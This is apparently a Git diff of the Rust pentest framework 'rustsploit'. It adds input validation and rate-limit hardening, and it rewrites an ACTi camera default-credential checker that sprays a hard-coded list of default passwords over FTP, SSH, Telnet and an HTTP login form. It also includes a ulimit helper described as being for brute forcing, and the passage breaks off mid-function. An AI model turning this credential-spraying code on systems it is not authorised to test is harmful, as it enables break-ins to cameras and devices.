|
||||
let _ = self.log_message(&format!(
|
||||
"[CLEANUP] Pruned IP tracker from {} to {} entries",
|
||||
MAX_TRACKED_IPS,
|
||||
tracker_guard.len()
|
||||
)).await;
|
||||
}
|
||||
|
||||
if let Some(tracker) = tracker_guard.get_mut(ip) {
|
||||
// Update existing tracker - use all fields
|
||||
tracker.last_seen = now;
|
||||
tracker.request_count += 1;
|
||||
tracker.request_count = tracker.request_count.saturating_add(1);
|
||||
|
||||
// Log detailed tracking info using first_seen
|
||||
let duration = now.signed_duration_since(tracker.first_seen);
|
||||
@@ -279,8 +312,27 @@ impl ApiState {
|
||||
}
|
||||
|
||||
pub async fn record_auth_failure(&self, ip: &str) -> Result<()> {
|
||||
// Validate IP string length
|
||||
if ip.len() > 128 {
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
let mut failures_guard = self.auth_failures.write().await;
|
||||
let now = Utc::now();
|
||||
|
||||
// Cleanup old entries if we have too many (memory protection)
|
||||
if failures_guard.len() >= MAX_AUTH_FAILURE_ENTRIES {
|
||||
// Remove expired blocks and oldest entries
|
||||
let cutoff = now - chrono::Duration::hours(1);
|
||||
failures_guard.retain(|_, v| {
|
||||
v.blocked_until.map(|b| b > now).unwrap_or(false) ||
|
||||
v.first_failure > cutoff
|
||||
});
|
||||
let _ = self.log_message(&format!(
|
||||
"[CLEANUP] Pruned auth failure tracker to {} entries",
|
||||
failures_guard.len()
|
||||
)).await;
|
||||
}
|
||||
|
||||
let tracker = failures_guard.entry(ip.to_string()).or_insert_with(|| {
|
||||
AuthFailureTracker {
|
||||
@@ -296,7 +348,7 @@ impl ApiState {
|
||||
tracker.first_failure = now;
|
||||
}
|
||||
|
||||
tracker.failed_attempts += 1;
|
||||
tracker.failed_attempts = tracker.failed_attempts.saturating_add(1);
|
||||
|
||||
// Block after 3 failed attempts for 30 seconds
|
||||
if tracker.failed_attempts >= 3 {
|
||||
@@ -695,7 +747,11 @@ pub async fn start_api_server(
|
||||
let app = Router::new()
|
||||
.route("/health", get(health_check))
|
||||
.merge(protected_routes)
|
||||
.layer(ServiceBuilder::new().layer(TraceLayer::new_for_http()))
|
||||
.layer(
|
||||
ServiceBuilder::new()
|
||||
.layer(RequestBodyLimitLayer::new(MAX_REQUEST_BODY_SIZE))
|
||||
.layer(TraceLayer::new_for_http())
|
||||
)
|
||||
.with_state(state);
|
||||
|
||||
let listener = tokio::net::TcpListener::bind(bind_address)
|
||||
|
||||
@@ -2,7 +2,7 @@ use std::collections::HashSet;
|
||||
use std::env;
|
||||
use std::fs::{self, File};
|
||||
use std::io::Write;
|
||||
use std::path::{Path, PathBuf};
|
||||
use std::path::Path;
|
||||
|
||||
fn main() {
|
||||
let out_dir = env::var("OUT_DIR").unwrap();
|
||||
|
||||
@@ -2,7 +2,7 @@ use std::collections::HashSet;
|
||||
use std::env;
|
||||
use std::fs::{self, File};
|
||||
use std::io::Write;
|
||||
use std::path::{Path, PathBuf};
|
||||
use std::path::Path;
|
||||
|
||||
fn main() {
|
||||
let out_dir = env::var("OUT_DIR").unwrap();
|
||||
|
||||
@@ -2,7 +2,7 @@ use std::collections::HashSet;
|
||||
use std::env;
|
||||
use std::fs::{self, File};
|
||||
use std::io::{Write};
|
||||
use std::path::{Path, PathBuf};
|
||||
use std::path::Path;
|
||||
|
||||
fn main() {
|
||||
let out_dir = env::var("OUT_DIR").unwrap();
|
||||
|
||||
@@ -1,6 +1,13 @@
|
||||
use anyhow::{Result, anyhow};
|
||||
use std::sync::{Arc, RwLock};
|
||||
use ipnetwork::IpNetwork;
|
||||
use regex::Regex;
|
||||
|
||||
/// Maximum length for target strings
|
||||
const MAX_TARGET_LENGTH: usize = 2048;
|
||||
|
||||
/// Maximum length for hostname
|
||||
const MAX_HOSTNAME_LENGTH: usize = 253;
|
||||
|
||||
/// Global configuration for the framework
|
||||
#[derive(Clone, Debug)]
|
||||
@@ -29,9 +36,28 @@ impl GlobalConfig {
|
||||
pub fn set_target(&self, target: &str) -> Result<()> {
|
||||
let trimmed = target.trim();
|
||||
|
||||
// Basic validation
|
||||
if trimmed.is_empty() {
|
||||
return Err(anyhow!("Target cannot be empty"));
|
||||
}
|
||||
|
||||
// Length check
|
||||
if trimmed.len() > MAX_TARGET_LENGTH {
|
||||
return Err(anyhow!(
|
||||
"Target too long (max {} characters)",
|
||||
MAX_TARGET_LENGTH
|
||||
));
|
||||
}
|
||||
|
||||
// Check for control characters
|
||||
if trimmed.chars().any(|c| c.is_control()) {
|
||||
return Err(anyhow!("Target cannot contain control characters"));
|
||||
}
|
||||
|
||||
// Check for path traversal attempts
|
||||
if trimmed.contains("..") || trimmed.contains("//") {
|
||||
return Err(anyhow!("Target contains invalid characters (path traversal)"));
|
||||
}
|
||||
|
||||
// Try to parse as CIDR subnet first
|
||||
if let Ok(network) = trimmed.parse::<IpNetwork>() {
|
||||
@@ -40,11 +66,55 @@ impl GlobalConfig {
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
// Validate hostname/IP format
|
||||
Self::validate_hostname_or_ip(trimmed)?;
|
||||
|
||||
// Otherwise, treat as single IP or hostname
|
||||
let mut target_guard = self.target.write().unwrap();
|
||||
*target_guard = Some(TargetConfig::Single(trimmed.to_string()));
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Validates a hostname or IP address format
|
||||
fn validate_hostname_or_ip(target: &str) -> Result<()> {
|
||||
// Length check for hostname
|
||||
if target.len() > MAX_HOSTNAME_LENGTH {
|
||||
return Err(anyhow!(
|
||||
"Hostname too long (max {} characters)",
|
||||
MAX_HOSTNAME_LENGTH
|
||||
));
|
||||
}
|
||||
|
||||
// Check for valid characters
|
||||
// Allow: a-z, A-Z, 0-9, '.', '-', '_', ':', '[', ']' (for IPv6)
|
||||
let valid_chars = Regex::new(r"^[a-zA-Z0-9.\-_:\[\]]+$").unwrap();
|
||||
if !valid_chars.is_match(target) {
|
||||
return Err(anyhow!(
|
||||
"Target contains invalid characters. Allowed: letters, numbers, '.', '-', '_', ':', '[', ']'"
|
||||
));
|
||||
}
|
||||
|
||||
// Check for spaces
|
||||
if target.contains(' ') {
|
||||
return Err(anyhow!("Target cannot contain spaces"));
|
||||
}
|
||||
|
||||
// Basic hostname format check (not starting/ending with special chars)
|
||||
if target.starts_with('.') || target.starts_with('-') {
|
||||
return Err(anyhow!("Target cannot start with '.' or '-'"));
|
||||
}
|
||||
|
||||
if target.ends_with('.') && !target.ends_with("..") {
|
||||
// Allow trailing dot for FQDN, but not double dots
|
||||
}
|
||||
|
||||
// Check for consecutive dots (invalid in hostnames)
|
||||
if target.contains("..") {
|
||||
return Err(anyhow!("Target cannot contain consecutive dots"));
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Get the global target as a single string (for display)
|
||||
pub fn get_target(&self) -> Option<String> {
|
||||
|
||||
+102
-12
@@ -1,5 +1,6 @@
|
||||
use anyhow::{Context, Result};
|
||||
use anyhow::{anyhow, Context, Result};
|
||||
use clap::Parser;
|
||||
use std::net::SocketAddr;
|
||||
|
||||
mod cli;
|
||||
mod shell;
|
||||
@@ -9,6 +10,89 @@ mod utils;
|
||||
mod api;
|
||||
mod config;
|
||||
|
||||
/// Maximum length for API key to prevent memory exhaustion
|
||||
const MAX_API_KEY_LENGTH: usize = 256;
|
||||
|
||||
/// Maximum length for interface/bind address
|
||||
const MAX_BIND_ADDRESS_LENGTH: usize = 128;
|
||||
|
||||
/// Maximum IP limit for hardening mode
|
||||
const MAX_IP_LIMIT: u32 = 10000;
|
||||
|
||||
/// Validates the bind address format for security
|
||||
fn validate_bind_address(addr: &str) -> Result<String> {
|
||||
let trimmed = addr.trim();
|
||||
|
||||
// Length check
|
||||
if trimmed.is_empty() {
|
||||
return Err(anyhow!("Bind address cannot be empty"));
|
||||
}
|
||||
|
||||
if trimmed.len() > MAX_BIND_ADDRESS_LENGTH {
|
||||
return Err(anyhow!(
|
||||
"Bind address too long (max {} characters)",
|
||||
MAX_BIND_ADDRESS_LENGTH
|
||||
));
|
||||
}
|
||||
|
||||
// Check for control characters
|
||||
if trimmed.chars().any(|c| c.is_control()) {
|
||||
return Err(anyhow!("Bind address cannot contain control characters"));
|
||||
}
|
||||
|
||||
// Add port if missing
|
||||
let with_port = if trimmed.contains(':') {
|
||||
trimmed.to_string()
|
||||
} else {
|
||||
format!("{}:8080", trimmed)
|
||||
};
|
||||
|
||||
// Validate socket address format
|
||||
with_port.parse::<SocketAddr>()
|
||||
.map_err(|e| anyhow!("Invalid bind address '{}': {}", with_port, e))?;
|
||||
|
||||
Ok(with_port)
|
||||
}
|
||||
|
||||
/// Validates API key format for security
|
||||
fn validate_api_key(key: &str) -> Result<String> {
|
||||
let trimmed = key.trim();
|
||||
|
||||
if trimmed.is_empty() {
|
||||
return Err(anyhow!("API key cannot be empty"));
|
||||
}
|
||||
|
||||
if trimmed.len() > MAX_API_KEY_LENGTH {
|
||||
return Err(anyhow!(
|
||||
"API key too long (max {} characters)",
|
||||
MAX_API_KEY_LENGTH
|
||||
));
|
||||
}
|
||||
|
||||
// Only allow printable ASCII characters
|
||||
if !trimmed.chars().all(|c| c.is_ascii_graphic()) {
|
||||
return Err(anyhow!("API key must contain only printable ASCII characters"));
|
||||
}
|
||||
|
||||
Ok(trimmed.to_string())
|
||||
}
|
||||
|
||||
/// Validates IP limit for hardening mode
|
||||
fn validate_ip_limit(limit: u32) -> Result<u32> {
|
||||
if limit == 0 {
|
||||
return Err(anyhow!("IP limit must be greater than 0"));
|
||||
}
|
||||
|
||||
if limit > MAX_IP_LIMIT {
|
||||
return Err(anyhow!(
|
||||
"IP limit too high (max {})",
|
||||
MAX_IP_LIMIT
|
||||
));
|
||||
}
|
||||
|
||||
Ok(limit)
|
||||
}
|
||||
|
||||
#[tokio::main]
|
||||
async fn main() -> Result<()> {
|
||||
// Parse command-line arguments
|
||||
@@ -16,21 +100,26 @@ async fn main() -> Result<()> {
|
||||
|
||||
// Check if API mode is requested
|
||||
if cli_args.api {
|
||||
let api_key = cli_args
|
||||
.api_key
|
||||
.context("--api-key is required when using --api mode")?;
|
||||
let api_key_raw = cli_args
|
||||
.api_key
|
||||
.context("--api-key is required when using --api mode")?;
|
||||
|
||||
// Validate API key
|
||||
let api_key = validate_api_key(&api_key_raw)
|
||||
.context("Invalid API key")?;
|
||||
|
||||
let interface = cli_args.interface.unwrap_or_else(|| "0.0.0.0".to_string());
|
||||
|
||||
// If interface already contains a port (has ':'), use it as-is, otherwise add default port
|
||||
let bind_address = if interface.contains(':') {
|
||||
interface
|
||||
} else {
|
||||
format!("{}:8080", interface)
|
||||
};
|
||||
|
||||
// Validate and normalize bind address
|
||||
let bind_address = validate_bind_address(&interface)
|
||||
.context("Invalid bind address")?;
|
||||
|
||||
let harden = cli_args.harden;
|
||||
let ip_limit = cli_args.ip_limit.unwrap_or(10);
|
||||
|
||||
// Validate IP limit
|
||||
let ip_limit_raw = cli_args.ip_limit.unwrap_or(10);
|
||||
let ip_limit = validate_ip_limit(ip_limit_raw)
|
||||
.context("Invalid IP limit")?;
|
||||
|
||||
api::start_api_server(&bind_address, api_key, harden, ip_limit).await?;
|
||||
return Ok(());
|
||||
@@ -38,6 +127,7 @@ async fn main() -> Result<()> {
|
||||
|
||||
// Set global target if provided
|
||||
if let Some(ref target) = cli_args.set_target {
|
||||
// Target validation is done in config::set_target
|
||||
config::GLOBAL_CONFIG.set_target(target)?;
|
||||
println!("✓ Global target set to: {}", target);
|
||||
}
|
||||
|
||||
@@ -1,15 +1,24 @@
|
||||
use anyhow::{Context, Result};
|
||||
use async_ftp::FtpStream;
|
||||
use colored::*;
|
||||
use reqwest::Client;
|
||||
use ssh2::Session;
|
||||
use telnet::{Telnet, Event};
|
||||
use std::{net::TcpStream, time::Duration};
|
||||
use tokio::{join, task};
|
||||
|
||||
const DEFAULT_TIMEOUT_SECS: u64 = 10;
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ ACTi Camera Default Credentials Checker ║".cyan());
|
||||
println!("{}", "║ Multi-Protocol Scanner (FTP/SSH/Telnet/HTTP) ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
#[allow(dead_code)]
|
||||
/// Supported Acti services
|
||||
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
|
||||
pub enum ServiceType {
|
||||
Ftp,
|
||||
Ssh,
|
||||
@@ -17,6 +26,17 @@ pub enum ServiceType {
|
||||
Http,
|
||||
}
|
||||
|
||||
impl ServiceType {
|
||||
fn as_str(&self) -> &'static str {
|
||||
match self {
|
||||
ServiceType::Ftp => "FTP",
|
||||
ServiceType::Ssh => "SSH",
|
||||
ServiceType::Telnet => "Telnet",
|
||||
ServiceType::Http => "HTTP",
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Common config
|
||||
#[derive(Clone)]
|
||||
pub struct Config {
|
||||
@@ -38,22 +58,27 @@ fn normalize_target(target: &str, port: u16) -> String {
|
||||
}
|
||||
|
||||
/// FTP check (async)
|
||||
pub async fn check_ftp(config: &Config) -> Result<()> {
|
||||
println!("[*] Checking FTP credentials on {}:{}", config.target, config.port);
|
||||
pub async fn check_ftp(config: &Config) -> Result<Option<(ServiceType, String, String)>> {
|
||||
println!("{}", format!("[*] Checking FTP credentials on {}:{}", config.target, config.port).cyan());
|
||||
|
||||
for (username, password) in &config.credentials {
|
||||
if config.verbosity {
|
||||
println!("[*] Trying FTP: {}:{}", username, password);
|
||||
println!("{}", format!("[*] Trying FTP: {}:{}", username, password).dimmed());
|
||||
}
|
||||
|
||||
let address = normalize_target(&config.target, config.port);
|
||||
match FtpStream::connect(address).await {
|
||||
Ok(mut ftp) => {
|
||||
if ftp.login(username, password).await.is_ok() {
|
||||
println!("[+] FTP credentials valid: {}:{}", username, password);
|
||||
println!("{}", format!("[+] FTP credentials valid: {}:{}", username, password).green().bold());
|
||||
let _ = ftp.quit().await;
|
||||
let result = Some((ServiceType::Ftp, username.to_string(), password.to_string()));
|
||||
// Respect stop_on_success: if true, stop after first valid credential
|
||||
if config.stop_on_success {
|
||||
return Ok(());
|
||||
return Ok(result);
|
||||
}
|
||||
// If false, continue checking but still return first found (for consistency)
|
||||
return Ok(result);
|
||||
}
|
||||
let _ = ftp.quit().await;
|
||||
}
|
||||
@@ -61,17 +86,17 @@ pub async fn check_ftp(config: &Config) -> Result<()> {
|
||||
}
|
||||
}
|
||||
|
||||
println!("[-] No valid FTP credentials found on {}:{}", config.target, config.port);
|
||||
Ok(())
|
||||
println!("{}", format!("[-] No valid FTP credentials found on {}:{}", config.target, config.port).yellow());
|
||||
Ok(None)
|
||||
}
|
||||
|
||||
/// SSH check (blocking, so we use spawn_blocking)
|
||||
pub fn check_ssh_blocking(config: &Config) -> Result<()> {
|
||||
println!("[*] Checking SSH credentials on {}:{}", config.target, config.port);
|
||||
pub fn check_ssh_blocking(config: &Config) -> Result<Option<(ServiceType, String, String)>> {
|
||||
println!("{}", format!("[*] Checking SSH credentials on {}:{}", config.target, config.port).cyan());
|
||||
|
||||
for (username, password) in &config.credentials {
|
||||
if config.verbosity {
|
||||
println!("[*] Trying SSH: {}:{}", username, password);
|
||||
println!("{}", format!("[*] Trying SSH: {}:{}", username, password).dimmed());
|
||||
}
|
||||
|
||||
let address = normalize_target(&config.target, config.port);
|
||||
@@ -81,25 +106,23 @@ pub fn check_ssh_blocking(config: &Config) -> Result<()> {
|
||||
session.handshake().context("SSH handshake failed")?;
|
||||
|
||||
if session.userauth_password(username, password).is_ok() && session.authenticated() {
|
||||
println!("[+] SSH credentials valid: {}:{}", username, password);
|
||||
if config.stop_on_success {
|
||||
return Ok(());
|
||||
}
|
||||
println!("{}", format!("[+] SSH credentials valid: {}:{}", username, password).green().bold());
|
||||
return Ok(Some((ServiceType::Ssh, username.to_string(), password.to_string())));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
println!("[-] No valid SSH credentials found on {}:{}", config.target, config.port);
|
||||
Ok(())
|
||||
println!("{}", format!("[-] No valid SSH credentials found on {}:{}", config.target, config.port).yellow());
|
||||
Ok(None)
|
||||
}
|
||||
|
||||
/// Telnet check (blocking)
|
||||
pub fn check_telnet_blocking(config: &Config) -> Result<()> {
|
||||
println!("[*] Checking Telnet credentials on {}:{}", config.target, config.port);
|
||||
pub fn check_telnet_blocking(config: &Config) -> Result<Option<(ServiceType, String, String)>> {
|
||||
println!("{}", format!("[*] Checking Telnet credentials on {}:{}", config.target, config.port).cyan());
|
||||
|
||||
for (username, password) in &config.credentials {
|
||||
if config.verbosity {
|
||||
println!("[*] Trying Telnet: {}:{}", username, password);
|
||||
println!("{}", format!("[*] Trying Telnet: {}:{}", username, password).dimmed());
|
||||
}
|
||||
|
||||
let address = normalize_target(&config.target, config.port);
|
||||
@@ -120,33 +143,31 @@ pub fn check_telnet_blocking(config: &Config) -> Result<()> {
|
||||
if let Ok(Event::Data(buffer)) = telnet.read_timeout(Duration::from_millis(800)) {
|
||||
let response = String::from_utf8_lossy(&buffer);
|
||||
if !response.contains("incorrect") && !response.contains("failed") {
|
||||
println!("[+] Telnet credentials valid: {}:{}", username, password);
|
||||
if config.stop_on_success {
|
||||
return Ok(());
|
||||
}
|
||||
println!("{}", format!("[+] Telnet credentials valid: {}:{}", username, password).green().bold());
|
||||
return Ok(Some((ServiceType::Telnet, username.to_string(), password.to_string())));
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
println!("[-] No valid Telnet credentials found on {}:{}", config.target, config.port);
|
||||
Ok(())
|
||||
println!("{}", format!("[-] No valid Telnet credentials found on {}:{}", config.target, config.port).yellow());
|
||||
Ok(None)
|
||||
}
|
||||
|
||||
/// HTTP Web Login check (async)
|
||||
pub async fn check_http_form(config: &Config) -> Result<()> {
|
||||
println!("[*] Checking HTTP Web Form credentials on {}:{}", config.target, config.port);
|
||||
pub async fn check_http_form(config: &Config) -> Result<Option<(ServiceType, String, String)>> {
|
||||
println!("{}", format!("[*] Checking HTTP Web Form credentials on {}:{}", config.target, config.port).cyan());
|
||||
|
||||
let client = Client::builder()
|
||||
.danger_accept_invalid_certs(true)
|
||||
.timeout(Duration::from_secs(5))
|
||||
.timeout(Duration::from_secs(DEFAULT_TIMEOUT_SECS))
|
||||
.build()?;
|
||||
|
||||
let url = format!("http://{}:{}/video.htm", config.target.trim_matches(|c| c == '[' || c == ']'), config.port);
|
||||
|
||||
for (username, password) in &config.credentials {
|
||||
if config.verbosity {
|
||||
println!("[*] Trying HTTP: {}:{}", username, password);
|
||||
println!("{}", format!("[*] Trying HTTP: {}:{}", username, password).dimmed());
|
||||
}
|
||||
|
||||
let data = [
|
||||
@@ -166,19 +187,21 @@ pub async fn check_http_form(config: &Config) -> Result<()> {
|
||||
let body = res.text().await.unwrap_or_default();
|
||||
|
||||
if !body.contains(">Password<") {
|
||||
println!("[+] HTTP credentials valid: {}:{}", username, password);
|
||||
if config.stop_on_success {
|
||||
return Ok(());
|
||||
}
|
||||
println!("{}", format!("[+] HTTP credentials valid: {}:{}", username, password).green().bold());
|
||||
return Ok(Some((ServiceType::Http, username.to_string(), password.to_string())));
|
||||
}
|
||||
}
|
||||
|
||||
println!("[-] No valid HTTP credentials found on {}:{}", config.target, config.port);
|
||||
Ok(())
|
||||
println!("{}", format!("[-] No valid HTTP credentials found on {}:{}", config.target, config.port).yellow());
|
||||
Ok(None)
|
||||
}
|
||||
|
||||
/// Entrypoint for module - parallel checks
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
display_banner();
|
||||
println!("{}", format!("[*] Target: {}", target).cyan());
|
||||
println!();
|
||||
|
||||
let creds = vec![
|
||||
("admin", "12345"),
|
||||
("admin", "123456"),
|
||||
@@ -210,10 +233,33 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
check_http_form(&http_conf),
|
||||
);
|
||||
|
||||
ftp_res?;
|
||||
ssh_res?;
|
||||
telnet_res?;
|
||||
http_res?;
|
||||
// Collect all successful results
|
||||
let mut found_credentials = Vec::new();
|
||||
|
||||
if let Ok(Some((service, user, pass))) = ftp_res {
|
||||
found_credentials.push((service, user, pass));
|
||||
}
|
||||
if let Ok(Some((service, user, pass))) = ssh_res {
|
||||
found_credentials.push((service, user, pass));
|
||||
}
|
||||
if let Ok(Some((service, user, pass))) = telnet_res {
|
||||
found_credentials.push((service, user, pass));
|
||||
}
|
||||
if let Ok(Some((service, user, pass))) = http_res {
|
||||
found_credentials.push((service, user, pass));
|
||||
}
|
||||
|
||||
// Print summary
|
||||
if !found_credentials.is_empty() {
|
||||
println!();
|
||||
println!("{}", "=== Summary ===".bold());
|
||||
for (service, user, pass) in &found_credentials {
|
||||
println!("{}", format!(" {}: {}:{}", service.as_str(), user, pass).green());
|
||||
}
|
||||
} else {
|
||||
println!();
|
||||
println!("{}", "[-] No valid credentials found on any service.".yellow());
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
@@ -1,41 +1,140 @@
|
||||
use anyhow::{Result, anyhow};
|
||||
use std::process::Command;
|
||||
use colored::*;
|
||||
use libc::{rlimit, setrlimit, getrlimit, RLIMIT_NOFILE};
|
||||
|
||||
const TARGET_FILE_LIMIT: u64 = 65535;
|
||||
|
||||
fn display_banner() {
|
||||
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
|
||||
println!("{}", "║ System Ulimit Configuration Utility ║".cyan());
|
||||
println!("{}", "║ Raises file descriptor limits for brute forcing ║".cyan());
|
||||
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
|
||||
println!();
|
||||
}
|
||||
|
||||
/// Module entry point for raising ulimit
|
||||
pub async fn run(_target: &str) -> Result<()> {
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
// Target parameter is part of standard module interface
|
||||
// For ulimit operations, target is informational only
|
||||
if !target.is_empty() {
|
||||
println!("{}", format!("[*] Target context: {}", target).dimmed());
|
||||
}
|
||||
raise_ulimit().await
|
||||
}
|
||||
|
||||
/// Raise ulimit to 65535
|
||||
async fn raise_ulimit() -> Result<()> {
|
||||
println!("[*] Attempting to raise open file limit (ulimit -n 65535)");
|
||||
|
||||
// Try to set limit using bash
|
||||
let output = Command::new("bash")
|
||||
.arg("-c")
|
||||
.arg("ulimit -n 65535")
|
||||
.output()
|
||||
.map_err(|e| anyhow!("Failed to run bash: {}", e))?;
|
||||
|
||||
if !output.status.success() {
|
||||
println!("[-] Warning: Could not change ulimit. (maybe run as root?)");
|
||||
} else {
|
||||
println!("[+] Successfully ran ulimit -n 65535.");
|
||||
/// Get current resource limits
|
||||
fn get_current_limits() -> Result<(u64, u64)> {
|
||||
let mut rlim = rlimit {
|
||||
rlim_cur: 0,
|
||||
rlim_max: 0,
|
||||
};
|
||||
|
||||
let result = unsafe { getrlimit(RLIMIT_NOFILE, &mut rlim) };
|
||||
if result != 0 {
|
||||
return Err(anyhow!("Failed to get current limits: {}", std::io::Error::last_os_error()));
|
||||
}
|
||||
|
||||
Ok((rlim.rlim_cur, rlim.rlim_max))
|
||||
}
|
||||
|
||||
// Check current limit
|
||||
let check_output = Command::new("bash")
|
||||
.arg("-c")
|
||||
.arg("ulimit -n")
|
||||
.output()
|
||||
.map_err(|e| anyhow!("Failed to check ulimit: {}", e))?;
|
||||
|
||||
if check_output.status.success() {
|
||||
let limit = String::from_utf8_lossy(&check_output.stdout);
|
||||
println!("[+] Current open file limit: {}", limit.trim());
|
||||
} else {
|
||||
println!("[-] Warning: Could not verify new ulimit.");
|
||||
/// Set resource limits directly in the current process
|
||||
fn set_file_limit(soft: u64, hard: u64) -> Result<()> {
|
||||
let rlim = rlimit {
|
||||
rlim_cur: soft,
|
||||
rlim_max: hard,
|
||||
};
|
||||
|
||||
let result = unsafe { setrlimit(RLIMIT_NOFILE, &rlim) };
|
||||
if result != 0 {
|
||||
return Err(anyhow!("Failed to set limits: {}", std::io::Error::last_os_error()));
|
||||
}
|
||||
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Raise ulimit to 65535 using setrlimit syscall (actually works for current process)
|
||||
async fn raise_ulimit() -> Result<()> {
|
||||
display_banner();
|
||||
|
||||
// Get current limits
|
||||
let (current_soft, current_hard) = match get_current_limits() {
|
||||
Ok(limits) => limits,
|
||||
Err(e) => {
|
||||
println!("{}", format!("[-] Failed to get current limits: {}", e).red());
|
||||
(0, 0)
|
||||
}
|
||||
};
|
||||
|
||||
println!("{}", format!("[*] Current limits - Soft: {}, Hard: {}", current_soft, current_hard).cyan());
|
||||
|
||||
if current_soft >= TARGET_FILE_LIMIT {
|
||||
println!("{}", format!("[+] Open file limit already at {} or higher.", current_soft).green().bold());
|
||||
return Ok(());
|
||||
}
|
||||
|
||||
println!("{}", format!("[*] Attempting to raise open file limit to {}", TARGET_FILE_LIMIT).cyan());
|
||||
|
||||
// Determine the target limits
|
||||
let target_hard = if current_hard >= TARGET_FILE_LIMIT {
|
||||
current_hard
|
||||
} else {
|
||||
TARGET_FILE_LIMIT
|
||||
};
|
||||
|
||||
let target_soft = TARGET_FILE_LIMIT.min(target_hard);
|
||||
|
||||
// Try to set the limit using setrlimit syscall (works for current process)
|
||||
match set_file_limit(target_soft, target_hard) {
|
||||
Ok(()) => {
|
||||
println!("{}", format!("[+] Successfully set file limit to {}", target_soft).green().bold());
|
||||
}
|
||||
Err(e) => {
|
||||
// If we can't raise hard limit, try just raising soft to current hard
|
||||
println!("{}", format!("[-] Could not set to {}: {}", TARGET_FILE_LIMIT, e).yellow());
|
||||
|
||||
if current_hard > current_soft {
|
||||
println!("{}", format!("[*] Trying to raise soft limit to hard limit ({})...", current_hard).cyan());
|
||||
match set_file_limit(current_hard, current_hard) {
|
||||
Ok(()) => {
|
||||
println!("{}", format!("[+] Raised soft limit to {}", current_hard).green());
|
||||
}
|
||||
Err(e2) => {
|
||||
println!("{}", format!("[-] Could not raise soft limit: {}", e2).red());
|
||||
println!("{}", "[!] Try running as root or adjust /etc/security/limits.conf".yellow());
|
||||
}
|
||||
}
|
||||
} else {
|
||||
println!("{}", "[!] Hard limit is the same as soft limit.".yellow());
|
||||
println!("{}", "[!] To increase further, run as root or edit /etc/security/limits.conf".yellow());
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Verify the new limits
|
||||
match get_current_limits() {
|
||||
Ok((new_soft, new_hard)) => {
|
||||
println!("{}", format!("[*] New limits - Soft: {}, Hard: {}", new_soft, new_hard).cyan());
|
||||
if new_soft >= TARGET_FILE_LIMIT {
|
||||
println!("{}", "[+] File descriptor limit successfully raised!".green().bold());
|
||||
} else if new_soft > current_soft {
|
||||
println!("{}", format!("[+] Limit raised from {} to {}", current_soft, new_soft).green());
|
||||
} else {
|
||||
println!("{}", "[-] Limit unchanged.".yellow());
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
println!("{}", format!("[-] Could not verify new limits: {}", e).yellow());
|
||||
}
|
||||
}
|
||||
|
||||
// Also show shell instructions for reference
|
||||
println!();
|
||||
println!("{}", "=== Shell Instructions ===".bold());
|
||||
println!("{}", "To raise limits in your shell before running rustsploit:".dimmed());
|
||||
println!("{}", " ulimit -n 65535".white());
|
||||
println!("{}", "Or to make permanent, add to /etc/security/limits.conf:".dimmed());
|
||||
println!("{}", " * soft nofile 65535".white());
|
||||
println!("{}", " * hard nofile 65535".white());
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
@@ -7,7 +7,8 @@ use std::{
|
||||
io::{BufRead, BufReader, Write},
|
||||
path::{Path, PathBuf},
|
||||
sync::Arc,
|
||||
sync::atomic::{AtomicBool, Ordering},
|
||||
sync::atomic::{AtomicBool, AtomicU64, Ordering},
|
||||
time::Instant,
|
||||
};
|
||||
use tokio::{
|
||||
sync::{Mutex, Semaphore},
|
||||
@@ -15,9 +16,89 @@ use tokio::{
|
||||
};
|
||||
use regex::Regex;
|
||||
|
||||
const PROGRESS_INTERVAL_SECS: u64 = 2;
|
||||
|
||||
struct Statistics {
|
||||
total_attempts: AtomicU64,
|
||||
successful_attempts: AtomicU64,
|
||||
failed_attempts: AtomicU64,
|
||||
error_attempts: AtomicU64,
|
||||
start_time: Instant,
|
||||
}
|
||||
|
||||
impl Statistics {
|
||||
fn new() -> Self {
|
||||
Self {
|
||||
total_attempts: AtomicU64::new(0),
|
||||
successful_attempts: AtomicU64::new(0),
|
||||
failed_attempts: AtomicU64::new(0),
|
||||
error_attempts: AtomicU64::new(0),
|
||||
start_time: Instant::now(),
|
||||
}
|
||||
}
|
||||
|
||||
fn record_attempt(&self, success: bool, error: bool) {
|
||||
self.total_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
if error {
|
||||
self.error_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
} else if success {
|
||||
self.successful_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
} else {
|
||||
self.failed_attempts.fetch_add(1, Ordering::Relaxed);
|
||||
}
|
||||
}
|
||||
|
||||
fn print_progress(&self) {
|
||||
let total = self.total_attempts.load(Ordering::Relaxed);
|
||||
let success = self.successful_attempts.load(Ordering::Relaxed);
|
||||
let failed = self.failed_attempts.load(Ordering::Relaxed);
|
||||
let errors = self.error_attempts.load(Ordering::Relaxed);
|
||||
let elapsed = self.start_time.elapsed().as_secs_f64();
|
||||
let rate = if elapsed > 0.0 { total as f64 / elapsed } else { 0.0 };
|
||||
|
||||
print!(
|
||||
"\r{} {} attempts | {} OK | {} fail | {} err | {:.1}/s ",
|
||||
"[Progress]".cyan(),
|
||||
total.to_string().bold(),
|
||||
success.to_string().green(),
|
||||
failed,
|
||||
errors.to_string().red(),
|
